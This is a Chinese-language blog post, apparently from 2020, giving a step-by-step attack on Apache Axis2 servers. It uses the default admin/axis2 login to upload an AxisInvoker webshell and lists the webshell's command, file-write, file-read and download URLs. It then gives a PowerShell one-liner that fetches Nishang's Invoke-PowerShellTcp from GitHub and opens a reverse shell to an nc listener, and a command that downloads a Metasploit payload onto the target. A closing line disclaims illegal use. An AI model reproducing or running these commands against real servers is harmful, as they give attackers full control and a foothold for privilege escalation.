Axis2默认弱口令后台Getshell+windows反弹webshell+metasploit提权

上传aar包获取webshell

  • 默认弱口令进入axis2控制台
http://ip:port/axis2/axis2-admin/login
默认口令密码
admin
axis2

  • aar包,使用方法

下载地址

支持的命令?
exec-运行命令,在Linux / Windows上均可使用,不用担心。

http://192.168.56.103:8080/axis2/services/AxisInvoker/exec?cmd=dir%20C:

写-写文件

http://192.168.56.103:8080/axis2/services/AxisInvoker/write?path=c:\1.1txt&content=123

info-显示某些信息,根据需要进行修改

http://192.168.56.103:8080/axis2/services/AxisInvoker/info

读取-读取文件内容

http://192.168.56.103:8080/axis2/services/AxisInvoker/read?path=c:\boot.ini

下载-下载文件并将其保存在某处

http://192.168.56.103:8080/axis2/services/AxisInvoker/download?url=http://www.baidu.com&file=c:\122.txt

windows命令行反弹shell

利用aarwebshell执行powershell反弹命令,攻击端nc监听

nc -lvp 6666
http://ip:port/axis2/services/AxisInvoker/exec?cmd=powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress yourip -port 6666

植入metasploit反弹shell

将msf生成shellcode存放网站目录——>利用目标服务器powershell下载——>执行shell,反弹成功

powershell (new-object System.Net.WebClient).DownloadFile( 'http://ip/shell1.exe','C:\Program Files\Apache Software Foundation\Tomcat 7.0\system.exe')


参考链接

windows命令行反弹shell(一)
windows命令下载大全
CaledoniaProject/AxisInvoker

声明

严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合!

posted @ 2020-12-17 16:48  renblog  阅读(1537)  评论(2编辑  收藏  举报